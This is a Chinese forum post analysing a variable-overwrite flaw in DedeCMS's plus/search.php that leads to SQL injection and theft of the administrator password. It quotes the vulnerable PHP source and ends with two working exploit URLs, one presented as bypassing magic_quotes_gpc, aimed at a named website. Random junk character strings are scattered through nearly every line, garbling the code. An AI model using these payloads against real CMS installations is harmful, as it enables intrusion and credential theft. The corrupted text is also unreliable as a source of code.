微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
6 j m J. q9 M4 t作者: c4rp3nt3r@0x50sec.org
% [# j+ V a6 P# ~$ ~" DDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
( s3 h% V0 z# A& u. r' \ ) p) ~! `) E% j) E5 i! Q+ {
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.9 A+ A9 E n3 f4 h5 G
# `) L+ \ ?' E0 A; C0 `, h============
: x; _5 T# @9 G2 Q1 k& J* X 6 A3 G+ u! c2 ]" U1 V! T$ ~
. s7 F0 g3 q8 t; A) A1 T$ k7 K
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.$ X' W) \+ Z. L+ y- ]; a" r
- V- f9 T; H R: g( H8 G# j. \7 z7 Frequire_once(dirname(__FILE__).”/../include/common.inc.php”);) o1 @4 m" s+ A9 ^
require_once(DEDEINC.”/arc.searchview.class.php”);% u" }& V/ i8 ^- U; j. C2 q$ `
: N2 Y. ~3 R6 a9 T, j) v
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
: f! r0 E( w; ~8 o' j3 A$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;/ H# [/ H5 n: A# _1 J4 |' F
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
V: @8 f r, {$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;; x& ]4 C* ~7 N8 U% n5 f+ _
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;3 x2 n7 q& U. ]- k/ C* {! c% t, _+ Z
: M% u# w5 \' S3 [9 c6 [
if(!isset($orderby)) $orderby=”;
; W4 ?( K7 T6 \0 D$ r+ B$ Z( S9 Z3 jelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
8 U- x! a5 X- }+ ~ 9 h8 M: U8 [3 p* g; T v* L+ q
; p" U, ^" L7 V6 n# `8 m7 W
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
- }0 o" W- p1 |else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);! d$ I/ |% d& Z3 D$ t: S" ?
6 K6 W; H( a n! z r6 y7 B1 Sif(!isset($keyword)){
6 k# D& [. ^: _' B7 k- }. [' d0 @ if(!isset($q)) $q = ”;6 q' g, V# f) _ ^3 L
$keyword=$q; x/ l! ~# D5 d; I6 a5 D
}
/ s0 `5 P8 Z5 w6 W 7 `# e% n+ r! k: D; b
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
" @+ d L ]0 D5 Z # [& n- k% ?1 E5 d5 e6 I& N! c7 _
//查找栏目信息
- z3 W; `2 Z4 M7 }- b( jif(empty($typeid))0 Q/ j3 f8 G3 }2 p6 @- M
{2 Z2 F) L0 M$ |
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
1 a! D6 q2 @6 Y3 h& {7 T/ n" } if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
4 Z3 i7 J; K' E0 v/ H9 g {; [2 n6 D# S! L5 w; M6 b
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
& o& f' J7 ?3 ?; j fwrite($fp, “<”.”?php\r\n”);# I' J9 R6 T1 e% K* ]8 m) j
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
8 ?' s$ a6 P$ l0 l $dsql->Execute();5 b7 r: a1 Z) k
while($row = $dsql->GetArray())( ]8 B5 F+ {5 k- c: V) |1 V% |
{1 V1 U* ^9 e0 e& S3 g
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);# G6 Z$ q+ Q3 f, C( r; a; x$ W
}
F+ ^: D; Q' y! b. } fwrite($fp, ‘?’.'>’);% O) a+ T' j' E) _, t/ G
fclose($fp);0 V( _ C) v' B* m, `% k. f
}! u# P7 v6 u# \. [" w
//引入栏目缓存并看关键字是否有相关栏目内容
( O/ E2 Q+ A9 M8 \# `, N5 \ require_once($typenameCacheFile);
7 [* q/ L/ X8 m& z//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个1 k7 d- x7 v" Y, Y& M$ W4 m
//5 S; S6 L! \# E
if(isset($typeArr) && is_array($typeArr))
- n0 |$ H O9 \( o# Q+ n {
' \4 z& u+ s" }5 u foreach($typeArr as $id=>$typename)
+ J' M, y, a4 G* K% b# S {
/ m. y3 C- k0 M; ~3 Z+ W. W & \( N5 \" O0 ~+ y
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
% P2 m6 @* {1 s5 a4 T0 p4 s if($keyword != $keywordn)
6 B5 r. [& _. l' U( s3 V {/ N0 W x {' m7 U+ H2 H
$keyword = $keywordn;; f c6 c- D0 K* C' o6 X+ ~3 s& \
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
: x: R" R# s" E& t1 K0 H break;; M! E) y; \9 C; T
}$ C1 D+ Y, b1 V: g t' E2 E
}
1 i' y s4 x2 `/ }( c2 q3 {$ i: r }
1 ^+ x, I Z: F) Q}
) k! j1 Q$ w/ X& v6 ?- j然后plus/search.php文件下面定义了一个 Search类的对象 . M/ O7 w$ u4 y& T+ ]4 Y
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
4 h- ?, D* H1 x* O) S$ [$this->TypeLink = new TypeLink($typeid);
% @7 [7 m8 }3 p7 z( G' k5 K
' d2 x, C5 c q5 ]4 f8 W# u% P; ZTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.0 E9 t% g: k8 ^, Q% ]" g; M1 o9 I
7 \, P3 c' k% T; rclass TypeLink
: y5 [9 ]9 W! Y/ W; Q{
% P8 O7 P. p1 f+ i6 n1 b var $typeDir;
Z& z8 v/ U5 l! R; H- A. | var $dsql;$ J# b3 `- V1 B
var $TypeID;6 u9 o+ G5 D7 O1 R4 u; L. y
var $baseDir;: p) j5 }7 ^8 T% i4 f
var $modDir;
. h+ Y# p$ _+ I$ T7 F2 K( O6 s var $indexUrl;+ j( d3 y6 S7 U2 R
var $indexName;
. r7 ]9 h6 z$ ^8 K/ X. R8 q var $TypeInfos;8 M; |( c. g/ _+ W
var $SplitSymbol;
5 D ^" X. b( k9 i9 Q var $valuePosition;9 \1 A3 F, F- Z& _. h
var $valuePositionName;
6 C. h; @6 H) @, R$ ~. | var $OptionArrayList;//构造函数///////4 ?2 l6 c: W; I
//php5构造函数
/ ~* G3 w3 }5 ^# x function __construct($typeid)9 V$ `. f* I# @" _3 u! B" S, x+ G7 i
{
. Y* n/ `, M i$ }6 @4 F4 N3 v $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
1 s- X. J6 Q! U& }+ i8 ^0 o $this->indexName = $GLOBALS['cfg_indexname'];3 Y# ?7 W+ B/ `! G7 s/ k3 ]
$this->baseDir = $GLOBALS['cfg_basedir'];
. Q3 Z+ i* z# l% Q8 \( A $this->modDir = $GLOBALS['cfg_templets_dir'];0 L7 j- o' p/ u1 {, h& Q
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];& h6 C) g* Z$ r
$this->dsql = $GLOBALS['dsql'];
3 r% n2 H. A/ M $this->TypeID = $typeid;5 w3 f u' X2 H4 j' h& n
$this->valuePosition = ”;
6 y% t5 L8 k3 b $this->valuePositionName = ”;: I3 l5 e6 Q, f# }
$this->typeDir = ”;& w9 n- f. l7 O9 n5 Z6 f
$this->OptionArrayList = ”;8 F) T& C! C1 A6 G: a- U& S
4 F7 {$ Q/ a& |6 m6 y3 ^" s/ ~
//载入类目信息" |9 B* U- [1 ]0 m( W
% r9 M0 d) a) G0 h- V% ]- c
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
. q$ G# V3 P0 h7 d6 r( V- @ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
^' d2 n! k: ]" g9 K`#@__channeltype` ch4 }( C; T7 t2 ~) R! Q1 w) ]+ p# y
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿( L6 W& J% F1 @2 Z
7 m5 E* B! e% U) z
if($typeid > 0)
& ^, U, y+ w; P) y$ s' E2 s: ^ {
, t8 D8 c- \, p, H9 a$ ^. r $this->TypeInfos = $this->dsql->GetOne($query);
& y3 Y4 _8 z% y$ z利用代码一 需要 即使magic_quotes_gpc = Off
( s( C" X, c3 k5 t+ f9 Z7 u) N3 y' c . D( g3 Z! {5 H V- A1 k
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title( q- y, I8 _+ ]4 m, S, v
- {: M% m$ A' e0 A
这只是其中一个利用代码… Search 类的构造函数再往下+ G# Y2 C9 ]7 w- k
+ j3 n- u: a( {+ @& O* {8 V/ P……省略1 _3 ]8 K" j6 Y2 W" Q# N. w
$this->TypeID = $typeid;
# s+ x( j# L% \3 L8 f……省略
9 ^/ z% R3 S( h8 ?. I5 pif($this->TypeID==”0″){
! I. ~% M$ f4 B$ w) V' O9 S) | $this->ChannelTypeid=1;* v$ Y% N9 k7 Y6 w$ f4 H, Y
}else{
* y. b, ]( d# R& ?1 w I, y $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲; X0 ] I( N2 [; `, S5 M
//现在不鸡肋了吧亲…; u& w9 l0 j: P7 ]! l1 h& a
$this->ChannelTypeid=$row['channeltype'];
, R1 @6 b- |& _5 R( U# b 0 D. T5 ]) e+ R
}
. w* S$ X4 G/ ?& Z利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
6 z) G5 O% {: @; y. x8 ?
$ F) R: a; k( E/ U# ~% u/ Gwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title7 h3 S3 x4 s- {+ C
. [3 Z6 |; Z3 W0 m如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站# a# _3 @- T8 f2 Z
|
发表于 2013-1-19 08:18:56
收藏
支持
反对